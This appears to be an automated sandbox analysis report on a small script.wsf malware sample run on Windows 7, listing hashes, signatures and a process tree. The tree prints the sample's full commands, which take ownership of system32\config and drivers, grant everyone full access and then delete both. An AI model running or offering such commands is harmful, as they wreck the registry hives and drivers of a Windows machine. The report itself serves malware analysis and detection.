Analysis
- max time kernel: 119s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 15-08-2024 21:30
- Static task: static1
- Behavioral task: behavioral1
  - Sample: script.wsf
  - Resource: win7-20240708-en
General
- Target: script.wsf
- Size: 2KB
- MD5: cef6ac1c7b72212cb9b26421ba748362
- SHA1: 05858a591fc90a1af835454aee11b7d893649517
- SHA256: 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
- SHA512: 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes:
    pid   process
    2636  takeown.exe
    2632  takeown.exe
    2316  icacls.exe
    2772  icacls.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes:
    pid   process
    2316  icacls.exe
    2772  icacls.exe
    2636  takeown.exe
    2632  takeown.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description                      pid   process
    Token: SeTakeOwnershipPrivilege  2632  takeown.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes (each parent-to-child write below was recorded three times, 21 events in total):
    description                       pid   process      target process
    PID 2372 wrote to memory of 320   2372  cmd.exe      WScript.exe
    PID 320 wrote to memory of 2824   320   WScript.exe  cmd.exe
    PID 320 wrote to memory of 2808   320   WScript.exe  cmd.exe
    PID 2824 wrote to memory of 2636  2824  cmd.exe      takeown.exe
    PID 2808 wrote to memory of 2632  2808  cmd.exe      takeown.exe
    PID 2824 wrote to memory of 2316  2824  cmd.exe      icacls.exe
    PID 2808 wrote to memory of 2772  2808  cmd.exe      icacls.exe
Processes
- C:\Windows\system32\cmd.exe
  cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"
  PID: 2372
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
    PID: 320
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      PID: 2824
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe
        takeown /f c:\windows\system32\config\*
        PID: 2636
        - Possible privilege escalation attempt
        - Modifies file permissions
      - C:\Windows\system32\icacls.exe
        icacls c:\windows\system32\config\* /grant everyone:(f)
        PID: 2316
        - Possible privilege escalation attempt
        - Modifies file permissions
    - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      PID: 2808
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe
        takeown /f c:\windows\system32\drivers\*
        PID: 2632
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe
        icacls c:\windows\system32\drivers\* /grant everyone:(f)
        PID: 2772
        - Possible privilege escalation attempt
        - Modifies file permissions
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T
  PID: 2152
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: cef6ac1c7b72212cb9b26421ba748362
  SHA1: 05858a591fc90a1af835454aee11b7d893649517
  SHA256: 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
  SHA512: 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
- Filesize: 98B
  MD5: 4b91264568ac2162700be36338c095e8
  SHA1: c95726edf8303e6adabcb12ffdca90b51349990a
  SHA256: 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
  SHA512: e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b